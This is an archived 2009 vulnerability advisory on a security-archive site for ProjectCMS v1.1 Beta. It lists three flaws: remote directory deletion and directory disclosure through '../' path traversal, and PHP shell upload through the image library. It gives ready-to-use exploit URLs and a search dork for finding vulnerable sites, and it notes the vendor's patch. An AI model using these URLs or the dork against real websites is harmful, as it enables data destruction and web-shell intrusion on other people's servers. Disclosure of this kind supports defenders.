Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: va3365.htm

ProjectCMS v-1.1 Beta multiple remote vulns



MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta-->
MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta-->



------------------------------------------------------------=0D
MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta-->=0D
------------------------------------------------------------=0D
=0D
CMS INFORMATION:=0D
=0D
-->WEB: http://projectcms.org/=0D 
-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.1_BETA.zip=0D 
-->DEMO: http://projectcms.org=0D 
-->CATEGORY: CMS / Portal=0D
-->DESCRIPTION: ProjectCMS is an open source community project to create=0D
		a simple content management system with an easy to follow install...=0D
-->RELEASED: 2009-05-01=0D
=0D
CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3=0D
-->DORK: "Powered by ProjectCMS"=0D
-->CATEGORY: Remote Dir Remove/ Shell Upload-Image Upload/ Remote Dir Disclosure=0D
-->AFFECT VERSION: <= 1.1 Beta=0D
-->Discovered Bug date: 2009-05-01=0D
-->Reported Bug date: 2009-05-01=0D
-->Fixed bug date: 2009-05-02=0D
-->Info patch(v-1.2 Beta): http://projectcms.org/=0D 
-->Info extra(v-1.1 Beta): Fixed Sql injection vuln (Reported on 2009-04-29)=0D
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
REMOTE DIR REMOVE:=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
File Vuln: HOME_PATH/admin_includes/admin_theme_remove.php =0D
Var Vuln: GET var "file"=0D
Description: You can remove a dir remotely.=0D
=0D
http://[HOST]/[HOME_PATH]/admin_includes/admin_theme_remove.php?file=../dir-to-remove/=0D 
=0D
=0D
=0D
#####################################=0D
/////////////////////////////////////=0D
=0D
SHELL UPLOAD/ARBITRARY IMAGE UPLOAD:=0D
=0D
/////////////////////////////////////=0D
#####################################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: $allowuploads include php extension (not default) +++++++++++++++++--------->>>>=0D
=0D
=0D
File Vuln: HOME_PATH/addons/imagelibrary/insert_image.php =0D
Description: You can upload a PHP shell=0D
=0D
http://[HOST]/[HOME_PATH]/addons/imagelibrary/insert_image.php=0D 
=0D
=0D
<<<<---------++++++++++++++ If the above condition is not met +++++++++++++++++--------->>>>=0D
=0D
Description: You can upload a arbitrary image=0D
=0D
http://[HOST]/[HOME_PATH]/addons/imagelibrary/insert_image.php=0D 
=0D
=0D
=0D
##############################=0D
//////////////////////////////=0D
=0D
REMOTE DIRECTORY DISCLOSURE:=0D
=0D
//////////////////////////////=0D
##############################=0D
=0D
=0D
File Vuln: HOME_PATH/addons/imagelibrary/select_image.php =0D
Var Vuln: GET var "dir"=0D
Description: You can show arbitrary directory=0D
=0D
http://[HOST]/[HOME_PATH]/addons/imagelibrary/select_image.php?dir=../=0D 
=0D
=0D
=0D
#######################################################################=0D
#######################################################################=0D
##*******************************************************************##=0D
##            ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ...         ##=0D
##*******************************************************************##=0D
##-------------------------------------------------------------------##=0D
##*******************************************************************##=0D
##              GREETZ TO: SPANISH H4ck3Rs community!                ##=0D
##*******************************************************************##=0D
#######################################################################=0D
#######################################################################


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH